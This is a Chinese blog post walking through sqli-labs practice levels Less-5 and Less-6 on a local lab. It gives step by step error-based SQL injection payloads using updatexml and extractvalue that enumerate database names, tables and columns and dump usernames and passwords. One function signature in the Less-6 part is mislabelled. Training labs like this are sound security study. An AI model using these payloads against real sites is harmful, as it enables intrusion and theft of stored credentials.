打穿sqli-labs靶场第四天(less5,less-6)手工报错盲注

最新推荐文章于 2023-06-16 15:45:34 发布
最新推荐文章于 2023-06-16 15:45:34 发布
阅读量3.7k 收藏 6
点赞数 1
分类专栏: sqli-labs 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45741871/article/details/124056763
版权

打穿sqli-labs靶场第四天(less5,less-6)手工报错盲注

启动靶场环境
在这里插入图片描述

less-5

浏览器访问靶场,选择第五关
在这里插入图片描述
根据关卡提示,此关参数类型是字符型,使用单引号过滤
进入靶场,根据页面提示传参
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-5/?id=1

在这里插入图片描述
测试注入点是否存在

http://127.0.0.1/sqli-labs-master/Less-5/?id='

在这里插入图片描述
分析页面报错信息,得知此处使用单引号过滤参数值
尝试闭合单引号并进一步测试注入点

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=1 --+ //页面回显正常
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=2 --+ //页面回显错误

在这里插入图片描述
在这里插入图片描述
确定注入点存在,爆破字段长度

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' order by 3 --+
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' order by 4 --+

根据页面回显确定字段长度为3
在这里插入图片描述
在这里插入图片描述
获取报错字段,但是回车后发现页面并没有回显数字(报错字段数),猜测此处属于无回显盲注

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=2 union select 1,2,3 --+

在这里插入图片描述
对于此关卡我们使用报错盲注的方法进行注入获取网站信息,使用的函数是updatexml:

UPDATEXML (XML_document, XPath_string, new_value) //此函数有三个参数,所以在使用时要传入三个参数

使用此函数查询数据库和连接数据库用户信息

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

concat():能够将传入的值连接起来并返回
0x7e:符号"~"
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+

在这里插入图片描述
查询数据库security下的所有表名,这里我们要了解一下updatexml()函数的特性:一次只能返回一个值

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1) --+

在这里插入图片描述
所以在这里使用limit 0,1(第一个0代表索引,第二个1表示返回一个值)限制他一次返回一个值

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) --+

第一个值为:emails
在这里插入图片描述
按照这样的方式不停的修改limit 的索引值,查询数据库下的所有表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) --+

这里为了节省篇幅,直接查询出users表(limit 3,1)
在这里插入图片描述
查询目标表(users)下的所有列名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1) --+

在这里插入图片描述
修改limit 的索引值,查询出所有的列名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1) --+

limit 4,1,查询出username列
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 5,1),0x7e),1) --+

limit 5,1 查询出password列
在这里插入图片描述
查询username和password列下的所有字段值数据(节省篇幅,直接查询username和password列)
username列

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+

在这里插入图片描述
password列

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+

在这里插入图片描述

less-6

浏览器访问靶场,选择第六关
在这里插入图片描述
根据关卡提示,此关参数类型为字符型,使用双引号过滤参数值
进入靶场,根据页面提示传入参数
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-6/?id=1

在这里插入图片描述
测试注入点是否存在,根据页面提示直接使用双引号进行测试

http://127.0.0.1/sqli-labs-master/Less-6/?id="

在这里插入图片描述
页面成功回显报错信息,证明SQL语句成功带入数据库执行,没有被过滤。根据页面回显报错信息,得知此处使用双引号过滤参数值。
尝试闭合符号并进一步测试注入点

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 1=1 --+ //页面回显正常
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 1=2 --+ //页面回显错误

在这里插入图片描述
在这里插入图片描述
爆破字段长度,根据页面回显获取字段长度为3

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 3 --+
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 4 --+

在这里插入图片描述
在这里插入图片描述
获取报错字段数

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 1=2 union select 1,2,3 --+

页面回显正常,没有回显报错字段数,使用报错盲注的方式进行注入获取网站信息
在这里插入图片描述

使用函数extractvalue():

UPDATEXML (XML_document, XPath_string, new_value) //此函数需要两个参数

获取数据库名和连接数据库用户信息

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select user()),0x7e)) --+

在这里插入图片描述
查询数据库security下的所有表名,extractvalue()函数依旧一次只能返回一个值

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select table_name  from information_schema.tables where table_schema=database()),0x7e)) --+

在这里插入图片描述
这里我们仍使用limit 限制返回值个数,查询索引值为3的表名

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select table_name  from information_schema.tables where table_schema=database() limit 3,1),0x7e)) --+

在这里插入图片描述
查询users表下的索引值为4的列名(username)

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select column_name  from information_schema.columns where table_name='users' limit 4,1),0x7e)) --+

在这里插入图片描述
查询users表下的索引值为5的列名(password)
在这里插入图片描述
查询username和password列下的字段值数据

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select username  from users limit 0,1),0x7e)) --+

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select password  from users limit 0,1),0x7e)) --+

在这里插入图片描述

总结

less-5和less-6都属于无回显的情况,所以我们使用盲注来获取网站数据库信息,同时我们也要对参数的类型进行确定,保证构造的SQL语句能够成功执行。

辰兴sec
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场Less-5
songling515010475的专栏
08-20 207
1、访问首页,/Less-5/index.php?id=1,这里的传参点是id 探测五步曲 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 搬出自己准备好的5步曲......好尴尬......慢慢有点难度了哟 结论:通过单引号闭合, 再用and 1=1 与 and 1=2控制条件,发现即不报错又能控制显示的文字。 2、判断字段数量 http://192.168.60.142:8080/sqlilabs/L..
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
sqli-labs Less-6(时间盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-02 241
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) sqli-labs Less-5(布尔盲注) 时间盲注常用函数 sleep()
打穿sqli-labs靶场——Day6 (less-8)手工布尔盲注
qq_45741871的博客
04-18 463
打穿sqli-labs靶场day6——less-8 手工布尔盲注
靶场sqli-labs的练习笔记(盲注Blind SQL报错注入等)第二章
m0_55314368的博客
06-16 183
2.时间注入,页面返回的值只有一种的时候(即为无论输入什么结果都按照正常的进行处理0),那么这时候我们就需要通过时间函数进行时间注入,通过页面的相应时间进行判断语句是否输入正确。由于and必须两边的条件都要满足,左边id=1肯定是真值,那么如果length函数猜错不等于8的时候就会没有回显。同理若ascii(substr(database(),1,1))=116中成立则执行1即通过,如果不成立则休眠。从而才出他的完整性。左边id=1必定成立,若右边不成立则没有反应,若为正确的返回不同的结果。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
最新发布
05-30
sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入、盲注、时间延迟注入等,理解它们的工作原理以及如何避免这些漏洞。靶场通常包含一系列逐步增加难度的挑战,每个挑战都模拟了一个具有特定漏洞的真实...
sql-labs报错注入、
weixin_47346400的博客
03-12 528
updatexml() 爆数据库 爆表 爆用户
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注
m0_54899775的博客
12-15 1188
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注 sqli-labs Less 5 sqli-labs Less 6
sqli-labs第四关
TA不懒,但还没有添加简介
09-08 442
sqli-labs第四关 第四关根据提示知道是基于双引号的错误,于是通过注入判断发现还有类似第三关的问题 构造一下sql语句 select 1,2,3 from table where id=("$id") 所以需要在1’后面增加一个") 然后使用order by 或者select 判断字段个数 然后和第一关、第二关一样的办法获得表、字段、数据 第一二关详细 第三关 总结 找到合适的注入点,通过反馈信息构造语句。 ...
sqli-lab(5~6详解)
gongjingege的博客
10-17 698
** Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) ** 知识点:1,时间延迟型手工注入;布尔型手工注入;使用concat聚合函数 2,payload原理及防御措施 3,sqlmap真香,脚本也好使 ** 0x0a 时间延迟型手工注入 ** ps: 什么是时间盲注,时间盲注就是页面不会有回显,没有回显怎么办?这时候我们可以通过sleep(),让他沉睡 为什么通过sleep() 可以判断是否存在时间盲注,因为只要
sqli-lab刷题Less-6 基于盲注的双引号型sql注入
MichealCurry1的博客
10-08 1617
sqli-lab刷题Less-6 基于盲注的双引号型sql注入 输入?id=1\,报出错误 猜测其原语句为"$id" LIMIT 0,1 输入?id=1" --+ 发现其不报错,说明猜测正确 输入?id=1" order by 3 --+,不报错,输入?id=1" order by 4 --+,报错 由此可以知道只有三个字段 输入?id=1" and 1=2 union select 1,2,3 --+,发现其不回显,说明为盲注 盲注具体看这篇文章sqli-lab刷题Less
sqli-labs Less5~6 布尔盲注(有报错回显)
双子叶mm的博客
10-22 212
双查询注入原理 这里参考了这篇文章: https://blog.csdn.net/Leep0rt/article/details/78556440 需要理解四个函数/语句: 1. rand() //随机函数 2. floor() //取整函数 3. count() //汇总函数 4. group by clause //分组语句 Rand()函数作用如下: 返回[0,1)之间的随机数,用法就是SELECT rand(); Floor()函数作用如下: 向下取整,用法即SELECT floor(11.
双注入通关 Sqli labs lesson 6 ,手工注入全程
dhdichch的博客
04-14 2417
1.找出注入点 先试试引号,在参数后面加上单引号和双引号: http://192.168.0.100/sqli-labs-master/Less-6/?id=1’” 页面报错如下: 可以看到,参数1后面的单引号和双引号是我们输入的,而1的前面有一个双引号,应该是后台程序自带的,据此判断,应该是一个双引号闭合的语句,我们可以输入一个双引号,再用--+注释掉后面内容: http://192.168.0.100/sqli-labs-master/Less-6/?id=1"--+ 结果如下:
mysql less6教程_Sqli labs系列-less-5&6 报错注入法(上)
weixin_31179927的博客
01-20 99
睡了一下午,晚上也没啥事,还特别精神,就想着,要不继续做做这个系列第五关和第六关吧,在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号。。。当然我是看了源码的。。。。基于报错注入的方法,我早就忘的差不多了,,,我记的我最后一次基于报错注入是在玩网络攻防平台第几关来着得,那个关卡时基于报错注入的,我当时还特地查了好多资料,学习了学习报错注入,当然在...
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7427
sqli-labs,sql注入,burpsuit
sqli-labs-less-5布尔盲注+错误注入(超详细,小白专属)
yzcn
10-26 933
Less-5 判断注入点: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 正常显示,但是与前四关不同,这里只有一句话:you are in, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ 显示错误,错误:’‘1’’ LIMIT 0,1’,多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’–+ 将单引号注释后,显示正常,继续返回一句话you are

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值